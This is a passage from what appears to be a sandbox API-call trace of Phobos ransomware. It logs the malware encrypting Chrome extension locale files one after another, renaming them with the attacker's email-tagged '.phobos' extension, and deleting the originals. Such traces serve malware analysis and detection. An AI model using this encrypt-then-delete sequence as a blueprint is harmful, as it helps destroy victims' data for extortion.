lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.911] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.911] CloseHandle (hObject=0x17c) returned 1 [0163.911] CloseHandle (hObject=0x134) returned 1 [0163.912] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json")) returned 1 [0163.912] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.913] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=18165) returned 1 [0163.913] CloseHandle (hObject=0x134) returned 1 [0163.913] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json")) returned 0x2020 [0163.913] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.913] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.913] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.914] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.914] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.914] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x46f5, lpOverlapped=0x0) returned 1 [0163.959] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4700, dwBufLen=0x4700 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4700) returned 1 [0163.959] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4700, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4700, lpOverlapped=0x0) returned 1 [0163.960] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0163.960] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.960] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0163.960] CryptDestroyKey (hKey=0xa32da8) returned 1 [0163.960] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0163.961] CryptDestroyKey (hKey=0xa32968) returned 1 [0163.961] CloseHandle (hObject=0x134) returned 1 [0163.961] CloseHandle (hObject=0x17c) returned 1 [0163.961] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json")) returned 1 [0163.962] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0163.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.962] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16204) returned 1 [0163.962] CloseHandle (hObject=0x17c) returned 1 [0163.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json")) returned 0x2020 [0163.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0163.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0163.963] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.963] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0163.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0163.963] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0163.963] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0163.963] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3f4c, lpOverlapped=0x0) returned 1 [0164.027] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f50, dwBufLen=0x3f50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f50) returned 1 [0164.027] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3f50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3f50, lpOverlapped=0x0) returned 1 [0164.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0164.028] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.028] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.028] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.028] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.028] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.028] CloseHandle (hObject=0x17c) returned 1 [0164.028] CloseHandle (hObject=0x134) returned 1 [0164.028] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json")) returned 1 [0164.029] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.030] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16799) returned 1 [0164.030] CloseHandle (hObject=0x134) returned 1 [0164.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json")) returned 0x2020 [0164.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.030] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.030] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.031] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.031] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.031] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x419f, lpOverlapped=0x0) returned 1 [0164.084] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x41a0, dwBufLen=0x41a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x41a0) returned 1 [0164.084] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x41a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x41a0, lpOverlapped=0x0) returned 1 [0164.085] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0164.086] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.086] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.086] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.086] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.086] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.086] CloseHandle (hObject=0x134) returned 1 [0164.086] CloseHandle (hObject=0x17c) returned 1 [0164.086] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json")) returned 1 [0164.087] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.087] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=20727) returned 1 [0164.087] CloseHandle (hObject=0x17c) returned 1 [0164.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json")) returned 0x2020 [0164.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.088] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.088] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.089] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.089] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.089] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x50f7, lpOverlapped=0x0) returned 1 [0164.090] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5100, dwBufLen=0x5100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5100) returned 1 [0164.090] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5100, lpOverlapped=0x0) returned 1 [0164.091] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0164.091] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.091] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.091] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.091] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.092] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.092] CloseHandle (hObject=0x17c) returned 1 [0164.092] CloseHandle (hObject=0x134) returned 1 [0164.092] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json")) returned 1 [0164.093] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.094] 